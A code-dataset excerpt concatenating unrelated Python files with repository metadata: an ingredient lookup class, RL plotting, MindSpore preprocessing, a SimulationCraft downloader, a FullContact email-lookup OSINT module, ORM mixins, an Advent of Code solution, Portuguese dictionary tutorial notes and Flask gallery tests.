ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list].
:param id:The ID for which an element is to be returned.
:return:The associated element.
"""
try:
x = [x for x in self.items if x[0] == id]
return x
except:
print('Error in method {0} in module {1}'.format('get_item', 'ingrediens.py'))
return None
def get_enumber(self, id):
"""Returns the name of an ingredient based on the ID of the substance.
:param id:The Id for which an E-number is to be returned.
:return:The corresponding E-number.
"""
try:
return self.get_item(id)[0][1]
except:
print('Error in method {0} in module {1}'.format('get_enumber', 'ingrediens.py'))
return None
def get_name(self, id):
"""Returns the name of an ingredient based on the ID of the substance.
:param id:The ID for which a name is to be returned.
:return:The corresponding name.
"""
try:
return self.get_item(id)[0][2]
except:
print('Error in method {0} in module {1}'.format('get_name', 'ingrediens.py'))
return None
def get_remark(self, id):
"""Returns the remark assigned to an ingredient based on the ID of the substance.
:param id:The ID for which a comment is to be returned.
:return:The corresponding remark.
"""
try:
return self.get_item(id)[0][3]
except:
print('Error in method {0} in module {1}'.format('get_remark', 'ingrediens.py'))
return None
def update(self):
"""Builds a dictionary based on the existing data. The search terms represent the key values, while
the value represents the ID of the ingredient.
The list consists of a variation of the E-number (E 123 ==> e123, e-123), the substance
names and the extended keyword list. If the ingredient or keyword contains an umlaut, a second version
with the underlying letter is added (a instead of ä etc.).
Preprocessing converts the matching strings to lowercase letters and removes all blanks during the
search.
"""
try:
x = [x for x in self.items]
for x in self.items:
# E-numbers can have attached letters. These must be retained.
e_number = str(x[1]).lower().strip()
e_number = e_number[0].replace('e', '') + e_number[1:]
e_number = e_number.strip()
self.search_items.update({'e' + e_number: x[0]})
self.search_items.update({'e-' + e_number: x[0]})
for y in x[2]:
insert_string = str(y).strip().lower().replace(' ', '')
self.search_items.update({insert_string: x[0]})
if self.replaceChar_in_String(insert_string) == True:
self.search_items.update({self.replaceChar(insert_string): x[0]})
for y in x[6]:
insert_srting = str(y).strip().lower().replace(' ', '')
self.search_items.update({insert_srting: x[0]})
if self.replaceChar_in_String(insert_string) == True:
self.search_items.update({self.replaceChar(insert_string): x[0]})
except:
print('Error in method {0} in module {1}'.format('update', 'ingrediens.py'))
| 39.065934 | 119 | 0.568776 |
8b03c4ca86da0b9cb69890510188b9bcc8bd9dc3
| 3,161 |
py
|
Python
|
shinrl/envs/mountaincar/plot.py
|
omron-sinicx/ShinRL
|
09f4ae274a33d1fc1d9d542f816aef40014af6b5
|
[
"MIT"
] | 34 |
2021-12-09T07:12:57.000Z
|
2022-03-11T08:17:20.000Z
|
shinrl/envs/mountaincar/plot.py
|
omron-sinicx/ShinRL
|
09f4ae274a33d1fc1d9d542f816aef40014af6b5
|
[
"MIT"
] | null | null | null |
shinrl/envs/mountaincar/plot.py
|
omron-sinicx/ShinRL
|
09f4ae274a33d1fc1d9d542f816aef40014af6b5
|
[
"MIT"
] | 4 |
2021-12-11T07:48:01.000Z
|
2022-03-01T23:50:33.000Z
|
import functools
from typing import Any, Optional
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from chex import Array
from matplotlib.axes import Axes
from .calc import *
from .config import MountainCarConfig
@jax.jit
def disc_pos_vel(
config: MountainCarConfig, pos: float, vel: float
) -> Tuple[float, float]:
pos_step = (config.pos_max - config.pos_min) / (config.pos_res - 1)
vel_step = (config.vel_max - config.vel_min) / (config.pos_res - 1)
pos_idx = jnp.floor((pos - config.pos_min) / pos_step + 1e-5).astype(jnp.uint32)
pos_idx = jnp.clip(pos_idx, 0, config.pos_res - 1)
vel_idx = jnp.floor((vel - config.vel_min) / vel_step + 1e-5).astype(jnp.uint32)
vel_idx = jnp.clip(vel_idx, 0, config.vel_res - 1)
return pos_idx, vel_idx
@functools.partial(jax.vmap, in_axes=(None, 1, 1), out_axes=0)
def undisc_pos_vel(
config: MountainCarConfig, pos_round: float, pos_vel: float
) -> Tuple[float, float]:
pos_step = (config.pos_max - config.pos_min) / (config.pos_res - 1)
vel_step = (config.vel_max - config.vel_min) / (config.pos_res - 1)
pos = pos_round * pos_step + config.pos_min
pos = jnp.clip(pos, config.pos_min, config.pos_max)
vel = pos_vel * vel_step + config.vel_min
vel = jnp.clip(vel, config.vel_min, config.vel_max)
return pos, vel
@functools.partial(jax.vmap, in_axes=(None, 1), out_axes=0)
def disc(config, s):
pos, vel = state_to_pos_vel(config, s)
pos, vel = disc_pos_vel(config, pos, vel)
return pos, vel
def plot_S(
tb: Array,
config: MountainCarConfig,
title: Optional[str] = None,
ax: Optional[Axes] = None,
cbar_ax: Optional[Axes] = None,
vmin: Optional[float] = None,
vmax: Optional[float] = None,
fontsize: Optional[int] = 10,
**kwargs: Any,
) -> None:
assert len(tb.shape) == 1
reshaped_values = np.empty((config.pos_res, config.vel_res))
reshaped_values[:] = np.nan
ss = jnp.arange(tb.shape[0])[:, None]
pos, vel = disc(config, ss)
reshaped_values[pos, vel] = tb
if ax is None:
grid_kws = {"width_ratios": (0.95, 0.05)}
fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(8, 6), gridspec_kw=grid_kws)
ax, cbar_ax = axes[0], axes[1]
vmin = tb.min() if vmin is None else vmin
vmax = tb.max() if vmax is None else vmax
pos_ticks, vel_ticks = [], []
ii = jnp.arange(config.pos_res)[:, None]
pos_ticks, vel_ticks = undisc_pos_vel(config, ii, ii)
pos_ticks = pos_ticks.reshape(-1).tolist()
pos_ticks = [round(pos, 3) for pos in pos_ticks]
vel_ticks = vel_ticks.reshape(-1).tolist()
vel_ticks = [round(vel, 3) for vel in vel_ticks]
data = pd.DataFrame(reshaped_values, index=pos_ticks, columns=vel_ticks).T
data = data.ffill(axis=0)
data = data.ffill(axis=1)
sns.heatmap(
data,
ax=ax,
cbar=cbar_ax is not None,
cbar_ax=cbar_ax,
vmin=vmin,
vmax=vmax,
**kwargs,
)
ax.set_title(title, fontsize=fontsize)
ax.set_xlabel("Position", fontsize=fontsize)
ax.set_ylabel("Velocity", fontsize=fontsize)
| 32.927083 | 88 | 0.660234 |
50655ba275e3ff99311dff03da229bfb4792bf29
| 4,357 |
py
|
Python
|
official/gnn/bgcf/preprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/gnn/bgcf/preprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/gnn/bgcf/preprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
preprocess.
"""
import os
import argparse
import numpy as np
from mindspore import Tensor
from mindspore.common import dtype as mstype
from src.utils import convert_item_id
from src.dataset import TestGraphDataset, load_graph
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", type=str, default="Beauty", help="choose which dataset")
parser.add_argument("--datapath", type=str, default="./scripts/data_mr", help="minddata path")
parser.add_argument("--num_neg", type=int, default=10, help="negative sampling rate ")
parser.add_argument("--raw_neighs", type=int, default=40, help="num of sampling neighbors in raw graph")
parser.add_argument("--gnew_neighs", type=int, default=20, help="num of sampling neighbors in sample graph")
parser.add_argument("--result_path", type=str, default="./preprocess_Result/", help="result path")
args = parser.parse_args()
def get_bin():
"""generate bin files."""
train_graph, _, sampled_graph_list = load_graph(args.datapath)
test_graph_dataset = TestGraphDataset(train_graph, sampled_graph_list, num_samples=args.raw_neighs,
num_bgcn_neigh=args.gnew_neighs,
num_neg=args.num_neg)
num_user = train_graph.graph_info()["node_num"][0]
num_item = train_graph.graph_info()["node_num"][1]
for i in range(50):
data_path = os.path.join(args.result_path, "data_" + str(i))
users_path = os.path.join(data_path, "00_users")
os.makedirs(users_path)
items_path = os.path.join(data_path, "01_items")
os.makedirs(items_path)
neg_items_path = os.path.join(data_path, "02_neg_items")
os.makedirs(neg_items_path)
u_test_neighs_path = os.path.join(data_path, "03_u_test_neighs")
os.makedirs(u_test_neighs_path)
u_test_gnew_neighs_path = os.path.join(data_path, "04_u_test_gnew_neighs")
os.makedirs(u_test_gnew_neighs_path)
i_test_neighs_path = os.path.join(data_path, "05_i_test_neighs")
os.makedirs(i_test_neighs_path)
i_test_gnew_neighs_path = os.path.join(data_path, "06_i_test_gnew_neighs")
os.makedirs(i_test_gnew_neighs_path)
test_graph_dataset.random_select_sampled_graph()
u_test_neighs, u_test_gnew_neighs = test_graph_dataset.get_user_sapmled_neighbor()
i_test_neighs, i_test_gnew_neighs = test_graph_dataset.get_item_sampled_neighbor()
u_test_neighs = Tensor(convert_item_id(u_test_neighs, num_user), mstype.int32)
u_test_gnew_neighs = Tensor(convert_item_id(u_test_gnew_neighs, num_user), mstype.int32)
i_test_neighs = Tensor(i_test_neighs, mstype.int32)
i_test_gnew_neighs = Tensor(i_test_gnew_neighs, mstype.int32)
users = Tensor(np.arange(num_user).reshape(-1,), mstype.int32)
items = Tensor(np.arange(num_item).reshape(-1,), mstype.int32)
neg_items = Tensor(np.arange(num_item).reshape(-1, 1), mstype.int32)
file_name = 'amazon-beauty.bin'
users.asnumpy().tofile(os.path.join(users_path, file_name))
items.asnumpy().tofile(os.path.join(items_path, file_name))
neg_items.asnumpy().tofile(os.path.join(neg_items_path, file_name))
u_test_neighs.asnumpy().tofile(os.path.join(u_test_neighs_path, file_name))
u_test_gnew_neighs.asnumpy().tofile(os.path.join(u_test_gnew_neighs_path, file_name))
i_test_neighs.asnumpy().tofile(os.path.join(i_test_neighs_path, file_name))
i_test_gnew_neighs.asnumpy().tofile(os.path.join(i_test_gnew_neighs_path, file_name))
print("=" * 20, "export bin files finished.", "=" * 20)
if __name__ == "__main__":
get_bin()
| 47.879121 | 108 | 0.708286 |
ba1237c81e0c4241ddb6bd5686ed9d889e12f4ee
| 3,951 |
py
|
Python
|
internal/auto_download.py
|
Saeldur/sl-shadow-priest
|
a7b027506e52db8e7786ed9d67971adbba7389bd
|
[
"MIT"
] | null | null | null |
internal/auto_download.py
|
Saeldur/sl-shadow-priest
|
a7b027506e52db8e7786ed9d67971adbba7389bd
|
[
"MIT"
] | null | null | null |
internal/auto_download.py
|
Saeldur/sl-shadow-priest
|
a7b027506e52db8e7786ed9d67971adbba7389bd
|
[
"MIT"
] | null | null | null |
"""downloads the nightly simc"""
#!/usr/bin/env python
import glob
import os
import re
import subprocess
import time
from urllib.error import URLError
from urllib.request import urlopen, urlretrieve
def download_latest():
"""main download function"""
seven_zip_paths = ["7z.exe", "C:/Program Files/7-Zip/7z.exe"]
seven_zip_executable = _find_7zip(seven_zip_paths)
print("Starting auto download check of SimulationCraft.")
# Application root path, and destination path
rootpath = os.path.dirname(os.path.realpath(__file__))
download_dir = os.path.join(rootpath, "..", "auto_download")
if not os.path.exists(download_dir):
os.makedirs(download_dir)
base_path = "http://downloads.simulationcraft.org/nightly"
# Get filename of latest build of simc
try:
html = urlopen(f"{base_path}/?C=M;O=D").read().decode("utf-8")
except URLError:
print("Could not access download directory on simulationcraft.org")
# filename = re.search(r'<a href="(simc.+win64.+7z)">', html).group(1)
filename = list(
filter(None, re.findall(r'.+nonetwork.+|<a href="(simc.+win64.+7z)">', html))
)[0]
print(f"Latest simc: {filename}")
# Download latest build of simc
filepath = os.path.join(download_dir, filename)
if not os.path.exists(filepath):
url = f"{base_path}/{filename}"
print(f"Retrieving simc from url '{url}' to '{filepath}'.")
urlretrieve(url, filepath)
else:
print(f"Latest simc version already downloaded at {filename}.")
return filepath.strip(".7z")
# Unpack downloaded build and set simc_path
dir_name = filename[: filename.find(".7z")]
simc_path = os.path.join(download_dir, dir_name, "simc.exe")
if not os.path.exists(simc_path):
# pylint: disable=broad-except
try:
cmd = f'{seven_zip_executable} x "{filepath}" -aoa -o"{download_dir}"'
print(f"Running unpack command '{cmd}'")
subprocess.call(cmd)
time.sleep(1)
# Nightly builds include their commit hash, we need to strip that out.
commit = dir_name.rsplit("-")[-1]
_rename_directory(f"{download_dir}/simc-*-win64/", commit)
except Exception as error:
print(f"Exception when unpacking: {error}")
# keep the latest 7z to remember current version, but clean up any other ones
_cleanup_older_files(download_dir, dir_name)
else:
print(f"Simc already exists at '{repr(simc_path)}'.")
return os.path.join(download_dir, dir_name)
def _find_7zip(search_paths):
"""Try to find 7zip, and raise an error if not"""
# pylint: disable=bare-except, unreachable
for executable in search_paths:
try:
if not os.path.exists(executable):
print(f"7Zip executable at '{executable}' does not exist.")
continue
return executable
break
except:
continue
else:
raise RuntimeError(
"Could not unpack the auto downloaded SimulationCraft executable."
f"Install 7Zip at one of the following locations: {search_paths}."
)
def _cleanup_older_files(download_dir, current_dir):
# pylint: disable=bare-except
try:
files = glob.glob(f"{download_dir}/simc*")
for file in files:
if (
os.path.basename(file) != current_dir
and os.path.basename(file) != f"{current_dir}.7z"
):
print(f"Removing old simc from '{os.path.basename(file)}'.")
os.remove(file)
except:
print("Unable to automatically remove files, cleanup old files in auto_download/")
def _rename_directory(glob_path, commit):
for folder in glob.glob(glob_path):
print(f"renaming {folder} -> {folder}-{commit}")
os.rename(folder, f"{folder[:-1]}-{commit}")
| 34.657895 | 90 | 0.630979 |
ad85fe9834a7307717abfda7761f72db44b57b62
| 1,876 |
py
|
Python
|
OSINT-SPY-master/modules/email_search.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
OSINT-SPY-master/modules/email_search.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
OSINT-SPY-master/modules/email_search.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
from .config import *
import requests
import json
def fetch_email(email_id, json_output=False):
url = 'https://api.fullcontact.com/v3/person.enrich'
headers = {"Authorization": f"Bearer {fullcontact_api_key}"}
data = json.dumps({"email": email_id})
response = requests.post(url, data=data, headers=headers)
if json_output:
print(response.json())
return
if response.status_code == 401:
print('Wrong fullcontact_api_key.')
return
if response.status_code == 403:
print('Invalid authentication. Check API key')
return
if response.status_code == 404:
print('Profile not found.')
return
print('General Details:')
print(('-' * 20))
attributes = ['fullName', 'ageRange', 'gender', 'location', 'title',
'organization', 'twitter', 'linkedin', 'facebook', 'bio', 'avatar', 'website']
response = response.json()
for attribute in attributes:
try:
value = response[attribute]
if value is not None:
print(f'{attribute.capitalize()}:: {value}')
except KeyError:
pass
print('\nMore details:')
print(('-' * 20))
details = ['emails', 'phones', 'employment', 'education', 'interests']
for attribute in details:
try:
value_list = response['details'][attribute]
if value_list:
print(f'{attribute.capitalize()}:: ')
print(('-' * 20))
for value in value_list:
if isinstance(value, str):
print(value, end=' ')
else:
for data in value:
print(f'{data.capitalize()}:: {value[data]}')
print()
print()
except KeyError:
pass
| 31.266667 | 96 | 0.534115 |
a8e96a1419b40c5be96c2127eaee9943ccfe26c2
| 1,930 |
py
|
Python
|
src/onegov/event/models/mixins.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/event/models/mixins.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/event/models/mixins.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.orm.types import UTCDateTime
from sedate import to_timezone
from sqlalchemy import Column
from sqlalchemy import String
from sqlalchemy import Text
from sqlalchemy.dialects.postgresql import HSTORE
from sqlalchemy.ext.mutable import MutableDict
class OccurrenceMixin(object):
""" Contains all attributes events and ocurrences share.
The ``start`` and ``end`` date and times are stored in UTC - that is, they
are stored internally without a timezone and are converted to UTC when
getting or setting, see :class:`UTCDateTime`. Use the properties
``localized_start`` and ``localized_end`` to get the localized version of
the date and times.
"""
#: Title of the event
title = Column(Text, nullable=False)
#: A nice id for the url, readable by humans
name = Column(Text)
#: Description of the location of the event
location = Column(Text, nullable=True)
#: Tags/Categories of the event
_tags = Column(MutableDict.as_mutable(HSTORE), nullable=True, name='tags')
@property
def tags(self):
""" Tags/Categories of the event. """
return list(self._tags.keys()) if self._tags else []
@tags.setter
def tags(self, value):
self._tags = dict(((key.strip(), '') for key in value))
#: Timezone of the event
timezone = Column(String, nullable=False)
#: Start date and time of the event (of the first event if recurring)
start = Column(UTCDateTime, nullable=False)
@property
def localized_start(self):
""" The localized version of the start date/time. """
return to_timezone(self.start, self.timezone)
#: End date and time of the event (of the first event if recurring)
end = Column(UTCDateTime, nullable=False)
@property
def localized_end(self):
""" The localized version of the end date/time. """
return to_timezone(self.end, self.timezone)
| 31.129032 | 78 | 0.689637 |
d16e278d7bc64d38072b77f5142fbceaee36a5ef
| 3,075 |
py
|
Python
|
aoc2020/day_20/part_1.py
|
en0/aoc2020
|
a2f41b909dffe1f366682b3d03fd5fbdbc924ec0
|
[
"MIT"
] | null | null | null |
aoc2020/day_20/part_1.py
|
en0/aoc2020
|
a2f41b909dffe1f366682b3d03fd5fbdbc924ec0
|
[
"MIT"
] | null | null | null |
aoc2020/day_20/part_1.py
|
en0/aoc2020
|
a2f41b909dffe1f366682b3d03fd5fbdbc924ec0
|
[
"MIT"
] | null | null | null |
from aoc2020 import *
from aoc2020.utils import math_product
from itertools import chain
import numpy as np
def tborder(tile):
_, m = tile
return "".join(m[0])
def bborder(tile):
_, m = tile
return "".join(m[-1])
def lborder(tile):
_, m = tile
return "".join(m[:,0])
def rborder(tile):
_, m = tile
return "".join(m[:,-1])
def orientations(tile):
k, m = tile
for _ in range(2):
for i in range(4):
yield k, m
m = np.rot90(m)
m = np.fliplr(m)
class Solution(SolutionABC):
expected = 20899048083289
def solve(self) -> any:
all_tiles = self.load_tiles()
image_table = self.get_image_table(all_tiles)
return math_product([image_table[y][x][0] for x, y in [(0, 0), (0, -1), (-1, 0), (-1, -1)]])
@classmethod
def get_image_table(cls, tiles):
# Find the top most piece.
search_tile = tiles[0]
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]):
if tborder(t0) == bborder(t):
search_tile = t
break
search_tile = t0
# Find the left most piece.
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]):
if lborder(t0) == rborder(t):
search_tile = t
break
search_tile = t0
assigned = set([search_tile[0]])
# Find all the left most pieces.
img = [[search_tile]]
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]):
if bborder(t0) == tborder(t):
search_tile = t
img.append([t])
assigned.add(t[0])
break
# Find the rest of each row
for row in img:
search_tile = row[0]
while search_tile is not None:
t0, search_tile = search_tile, None
for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]):
if rborder(t0) == lborder(t):
search_tile = t
row.append(t)
assigned.add(t[0])
break
#for r in img:
# print(" ".join([str(c) for c, _ in r]))
return img
def load_tiles(self):
with self.load_resource("input") as src:
return [(k, m) for k, m in self.read_tiles(src)]
def read_tiles(self, src):
while True:
tile_heading = self.read_line(src)
if tile_heading == "":
return
tile_id = int(tile_heading[5:-1])
matrix = list(self.read_until(src, xfrm=lambda s: list(s)))
yield tile_id, np.array(matrix)
| 29.009434 | 100 | 0.509593 |
66f5d3ec30ee3cb74953f418ac60d6f97eadd0de
| 5,233 |
py
|
Python
|
Python/Programação_em_Python_Essencial/5- Coleções/dicionarios.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Programação_em_Python_Essencial/5- Coleções/dicionarios.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Programação_em_Python_Essencial/5- Coleções/dicionarios.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
"""
Dicionários
OBS: Em algumas linguagens de programação, os dicionários Python são conhecidos
por mapas.
Dicionários são coleções do tipo chave/valor. (Mapeamento entre chave e valor)
#Tuplas
[0, 1, 2]
[1, 2, 3]
# Listas
(0, 1, 2)
(1, 2, 3)
Dicionários são representados por chaves {}.
print(type({}))
OBS: Sobre dicionários
- Chave e valor são separados por dois pontos 'chave:valor';
- Tanto chave quanto valor podem ser de qualquer tipo de dado;
- Podemos misturar tipos de dados;
# Criação de dicionários
# Forma1 (Mais comum)
paises = {'br': 'Brasil', 'eua': 'Estados Unidos', 'py': 'Paraguay'}
print(paises)
print(type(paises))
# Forma2 (Menos comum)
paises = dict(br='Brasil', eua='Estados Unidos', py='Paraguay')
print(paises)
print(type(paises))
# Acessando elementos
# Forma1 - Acessando via chave, da mesma forma que lista/tupla
print(paises['br'])
# print(paises['ru'])
# OBS: Caso tentamos fazer um acesso utilizando uma chave que não existe, teremos o erro KeyError
# Forma2 - Acessando via get (Recomendada)
print(paises.get('br'))
print(paises.get('ru'))
# Caso o get não encontre o objeto com a chave informada, será retornado o valor None e não será gerado KeyError
pais = paises.get('ru')
if pais:
print(f'Encontrei o país {pais}')
else:
print('Não encontrei o país')
# Podemos definir um valor padrão para caso não encontremos o objeto com a chave informada
pais = paises.get('ru', 'Não encontrado')
print(f'Encontrei o país {pais}')
# Podemos verificar se determinada chave se encontra em um dicionário
print('br' in paises)
print('ru' in paises)
print('Estados Unidos' in paises)
if 'ru' in paises:
russia = paises['ru']
# Podemos utilizar qualquer tipo de dado (int, float, string, boolean), inclusive lista, tupla, dicionário, como chaves
# de dicionários.
# Tuplas, por exemplo, são bastante interessantes de serem utilizadas como chave de dicionários, pois as mesmas
# são imutáveis.
localidades = {
(35.6895, 39.6917): 'Escritório em Tókio'
(40.7128, 74.0060): 'Escritório em Nova York'
(37.7749, 122.4194): 'Escritório em São Paulo'
}
print(localidades)
print(type(localidades))
# Adicionar elementos em um dicionário
receita = {'jan': 100, 'fev': 120, 'mar': 300}
print(receita)
print(type(receita))
# Forma1 - Mais comum
receita['abr'] = 350
print(receita)
# Forma2
novo_dado = {'mai': 500}
receita.update(novo_dado) # receita.update({'mai': 500})
print(receita)
# Atualizando dados em um dicionário
# Forma1
receita['mai'] = 550
print(receita)
# Forma2
receita.update({'mai': 600})
print(receita)
# CONCLUSÃO1: A forma de adicionar novos elementos ou atualizar dados em um dicionário é a mesma.
# CONCLUSÃO2: Em dicionários, NÂO podemos ter chaves repetidas.
# Remover dados de um dicionário
receita = {'jan': 100, 'fev': 120, 'mar': 300}
print(receita)
# Forma1 - Mais comum
ret = receita.pop('mar')
print(ret)
print(receita)
# OBS1: Aqui precisamos SEMPRE informar a chave, e caso não encontre o elemento, um KeyError é retornado.
# OBS2: Ao removermos um objeto, o valor deste objeto é sempre retornado.
# Forma2
del receita['fev']
print(receita)
# Se a chave não existir, será gerado um KeyError
# OBS: Neste caso, o valor removido não é retornado.
# Imagine que você tem um comércio eletrônico, onde temos um carrinho de compras na qual adicionamos produtos.
Carrinho de Compras:
Produto 1:
- nome;
- quantidade;
- preço;
Produto 2:
- nome;
- quantidade;
- preço;
# 1 - Poderíamos utilizar uma Lista para isso? Sim
carrinho = []
produto1 = ['PlayStation 4', 1, 2300.00]
produto2 = ['God of War 4', 1, 150.00]
carrinho.append(produto1)
carrinho.append(produto2)
print(carrinho)
# Teríamos que saber qual é o índice de cada informação no produto.
# 2 - Poderíamos utilizar uma Tupla para isso? Sim
produto1 = ('PlayStation 4', 1, 2300.00)
produto2 = ('God of War 4', 1, 150.00)
carrinho = (produto1, produto2)
print(carrinho)
# 3 - Poderíamos utilizar um Dicionário para isso? Sim
carrinho = []
produto1 = {'Nome': 'PlayStation 4', 'Quantidade': 1, 'Preço': 2300.00}
produto2 = {'Nome': 'God of War 4', 'Quantidade': 1, 'Preço': 150.00}
carrinho.append(produto1)
carrinho.append(produto2)
print(carrinho)
# Desta forma, facilmente adicionamos ou removemos produtos no carrinho e em cada produto
# podemos ter a certeza sobre cada informação.
# Métodos de dicionários
d = dict(a=1, b=2, c=3)
print(d)
print(type(d))
# Limpar o dicionário (Zerar dados)
d.clear()
print(d)
# Copiando um dicionário para outro
# Forma1 # Deep Copy
novo = d.copy()
print(novo)
novo['d'] = 4
print(d)
print(novo)
# Forma2 # Shallow Copy
novo = d
print(novo)
novo['d'] = 4
print(d)
print(novo)
"""
# Forma não usual de criação de dicionários
outro = {}.fromkeys('a', 'b')
print(outro)
print(type(outro))
usuario = {}.fromkeys(['nome', 'pontos', 'email', 'profile'], 'desconhecido')
print(usuario)
print(type(usuario))
# O método fromkeys recebe dois parâmetros: um iterável e um valor.
# Ele vai gerar para cada valor do iterável uma chave e irá atribuir a esta chave o valor informado.
veja = {}.fromkeys('teste', 'valor')
print(veja)
veja = {}.fromkeys(range(1, 11), 'novo')
print(veja)
| 19.672932 | 119 | 0.708962 |
7d2101f86882a0cc92b62811b4a431f69e0f581a
| 8,025 |
py
|
Python
|
tests/test_gallery.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | null | null | null |
tests/test_gallery.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | 16 |
2017-09-13T10:21:40.000Z
|
2020-06-01T04:32:22.000Z
|
tests/test_gallery.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | null | null | null |
import sys
from datetime import datetime
from io import BytesIO
import pytest
import requests_mock
from flask import current_app, request, url_for, json
from flask_login import current_user
from marshmallow import pprint
from benwaonline import mappers
from benwaonline import entities
from benwaonline.gallery import views
from benwaonline.exceptions import BenwaOnlineError, BenwaOnlineRequestError
import utils
JWKS = utils.load_test_data('test_jwks.json')
def benwa_resp():
return {
"access_token": "LnUwYsyKvQgo8dLOeC84y-fsv_F7bzvZ",
'refresh_token': 'refresh_me_thanks',
"expires_in": 3600,
"scope": "openid email",
"token_type": "Bearer"
}
def auth_payload():
return {
"iss": "https://choosegoose.benwa.com/",
"sub": "59866964",
"aud": "1LX50Fa2L80jfr9P31aSZ5tifrnLFGDy",
"iat": 1511860306,
"exp": 1511896306
}
def mock_auth_response(mocker, resp):
mock = mocker.patch('benwaonline.auth.views.benwa.authorized_response')
mock.return_value = resp
return mock
def login(client, mocker, m):
user = utils.test_user()
mocker.patch('benwaonline.auth.views.get_jwks', return_value=JWKS)
mocker.patch('benwaonline.auth.views.verify_token', return_value=auth_payload())
mocker.patch('benwaonline.auth.views.handle_authorize_response', return_value=benwa_resp())
mocker.patch('benwaonline.auth.views.UserGateway.get_by_user_id', return_value=user)
return client.get(url_for('authbp.authorize_callback'), follow_redirects=False)
def signup(client, redirects=False):
form = {'adjective': 'Beautiful', 'benwa': 'Benwa', 'noun': 'Aficionado', 'submit': True}
return client.post(url_for('authbp.signup'), data=form, follow_redirects=redirects)
def logout(client):
mocker.patch('benwaonline.auth.views.verify_token', return_value=auth_payload())
return client.get('/auth/logout/callback', follow_redirects=False)
def make_comment(client, post_id, data):
uri = url_for('gallery.add_comment', post_id=post_id)
return client.post(uri, data=data)
class TestShowPosts(object):
post_uri = mappers.collection_uri(entities.Post())
tag_uri = mappers.collection_uri(entities.Tag())
with open('tests/data/show_posts.json') as f:
test_data = json.load(f)
def test_empty_db(self, client):
with requests_mock.Mocker() as mock:
mock.get('/api/posts', json={'data': []})
mock.get(self.tag_uri, json={'data':[]})
response = client.get(url_for('gallery.show_posts'))
assert response.status_code == 200
response = client.get(url_for('gallery.show_posts', tags='benwa'))
assert response.status_code == 200
response = client.get(url_for('gallery.show_posts', tags='benwa+oldbenwa'), follow_redirects=True)
assert response.status_code == 200
def test_posts_exist(self, client):
posts = self.test_data['posts_with_previews']
tags = self.test_data['tags']
with requests_mock.Mocker() as mock:
mock.get('/api/posts', json=posts)
mock.get(self.tag_uri, json=tags)
response = client.get(url_for('gallery.show_posts'))
assert response.status_code == 200
response = client.get(url_for('gallery.show_posts', tags='benwa'))
assert response.status_code == 200
response = client.get(
url_for('gallery.show_posts', tags='benwa+oldbenwa'), follow_redirects=True)
assert response.status_code == 200
class TestShowPost(object):
post_id = 1
post_uri = mappers.instance_uri(entities.Post(id=1))
comments_uri = mappers.resource_uri(entities.Post(id=1), 'comments')
with open('tests/data/show_post.json') as f:
test_data = json.load(f)
post = test_data['post']
comments = test_data['comments']
def test_no_post_exists(self, client, mocker):
with requests_mock.Mocker() as mock:
mock.get(self.post_uri, status_code=404, json=utils.error_response('Post', 1))
response = client.get(
url_for('gallery.show_post', post_id=self.post_id), follow_redirects=False)
assert response.status_code == 200
with pytest.raises(BenwaOnlineRequestError):
template = views.show_post(post_id=1)
assert 'Object not found' in template
